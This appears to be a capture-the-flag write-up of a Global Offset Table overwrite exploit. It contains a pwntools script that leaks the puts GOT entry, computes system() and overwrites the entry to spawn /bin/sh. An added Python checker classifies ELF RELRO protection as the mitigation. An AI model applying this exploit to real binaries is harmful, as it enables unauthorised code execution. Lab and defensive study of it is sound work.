GOT-00

Return-to-got exploit -00


OK, this one is an easy exploit: overwriting the Global Offset Table (GOT). It can be used even if ASLR is on.
1.) Leak the GOT's address. I found out that it is at the 60th position above our buffer.
2.) Calculate the system address.
3.) Now overwrite the GOT entry of puts with the system address, and since the argument of puts is the buffer, overflow it with the string '/bin/sh'.



from pwn import *

p = process("got")

# Step 1: leak the GOT entry of puts, 60 slots above the buffer
print(p.recvuntil(b"?\n"))  # prompt: which buffer
p.sendline(b"1")
print(1)
p.recvline()                # prompt: index
p.sendline(b"-60")
msg = p.recv(4)
msg = u32(msg)
print(hex(msg))

# Step 2: compute system() from the leaked libc address (offset for this libc)
system = msg - 0x23ca0
print("[+] Target address")
print(hex(system))

# Step 3: system address, padding up to the buffer, then the puts argument
payload = pack(system) + b"A" * 72 + b"/bin/sh\x00"

# overwriting part: which buffer
print(p.recvuntil(b"?\n"))
p.sendline(b"1")
p.recvline()                # prompt: index
p.sendline(b"-76")
# write part
print("[+] sending payload")
p.sendline(payload)
p.interactive()
# raw_input()
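The overwrite above only works because the GOT is still writable when the overflow happens: the dynamic loader resolves puts lazily, so the entry must stay in a writable page. Building with Full RELRO (a PT_GNU_RELRO segment plus BIND_NOW, so every import is resolved at startup and the GOT is then remapped read-only) removes that write target, which is the first thing to check when auditing a binary for this class of bug. The following checker is an added example and is not part of the original writeup; it parses the ELF program headers and dynamic section directly and classifies the RELRO level the same way the `readelf -l` / `readelf -d` output would be read by hand. The three sample ELF images it builds are constructed here for the test (headers only, no code) and are not the challenge binary.

```python
"""Classify the RELRO level of a little-endian ELF image (none / partial / full).

Full RELRO is the mitigation that defeats a GOT overwrite: with BIND_NOW every
import is resolved before main() and the GOT lives inside PT_GNU_RELRO, which
the loader remaps read-only.
"""
import struct
import sys

PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL = 0
DT_BIND_NOW = 24
DT_FLAGS = 30
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1


def relro_level(elf: bytes) -> str:
    """Return 'none', 'partial' or 'full' for the given ELF file contents."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if elf[5] != 1:
        raise ValueError("only little-endian ELF is handled here")
    is64 = elf[4] == 2
    if is64:
        e_phoff = struct.unpack_from("<Q", elf, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
        phdr_fmt, dyn_fmt = "<IIQQQQQQ", "<qQ"   # Elf64_Phdr, Elf64_Dyn
    else:
        e_phoff = struct.unpack_from("<I", elf, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
        phdr_fmt, dyn_fmt = "<IIIIIIII", "<iI"   # Elf32_Phdr, Elf32_Dyn

    has_relro = False
    dyn_off = dyn_size = None
    for i in range(e_phnum):
        fields = struct.unpack_from(phdr_fmt, elf, e_phoff + i * e_phentsize)
        if is64:   # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, ...
            p_type, _flags, p_offset, _va, _pa, p_filesz = fields[:6]
        else:      # p_type, p_offset, p_vaddr, p_paddr, p_filesz, ...
            p_type, p_offset, _va, _pa, p_filesz = fields[:5]
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            dyn_off, dyn_size = p_offset, p_filesz
    if not has_relro:
        return "none"          # GOT stays writable for the whole run

    # Partial RELRO protects .init_array etc., but the GOT is still written by
    # the lazy resolver; only BIND_NOW moves the GOT behind the read-only mapping.
    bind_now = False
    if dyn_off is not None:
        ent = struct.calcsize(dyn_fmt)
        for off in range(dyn_off, dyn_off + dyn_size, ent):
            tag, val = struct.unpack_from(dyn_fmt, elf, off)
            if tag == DT_NULL:
                break
            if (tag == DT_BIND_NOW
                    or (tag == DT_FLAGS and val & DF_BIND_NOW)
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                bind_now = True
    return "full" if bind_now else "partial"


def build_elf32(relro: bool, bind_now: bool) -> bytes:
    """Constructed minimal ELF32 image (header, phdrs, dynamic section only)."""
    dyn = b""
    if bind_now:
        dyn += struct.pack("<iI", DT_FLAGS, DF_BIND_NOW)
    dyn += struct.pack("<iI", DT_NULL, 0)
    n_ph = 2 if relro else 1
    dyn_off = 52 + 32 * n_ph                      # dynamic section follows the phdrs
    phdrs = [struct.pack("<IIIIIIII", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4)]
    if relro:
        phdrs.append(struct.pack("<IIIIIIII", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    # e_ident: ELFCLASS32, ELFDATA2LSB, EV_CURRENT; then ET_DYN / EM_386 header
    ehdr = (b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
            + struct.pack("<HHIIIIIHHHHHH", 3, 3, 1, 0, 52, 0, 0, 52, 32, n_ph, 40, 0, 0))
    return ehdr + b"".join(phdrs) + dyn


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(sys.argv[1], relro_level(f.read()))
    else:
        for r, b in ((False, False), (True, False), (True, True)):
            print(f"constructed relro={r} bind_now={b}: {relro_level(build_elf32(r, b))}")
```

Run it with a path to any ELF binary to classify it, or with no arguments to see the three constructed cases. A result of "none" or "partial" means a write primitive into .got/.got.plt, like the one in this challenge, still has a target; "full" means the loader has already made that page read-only before user code runs.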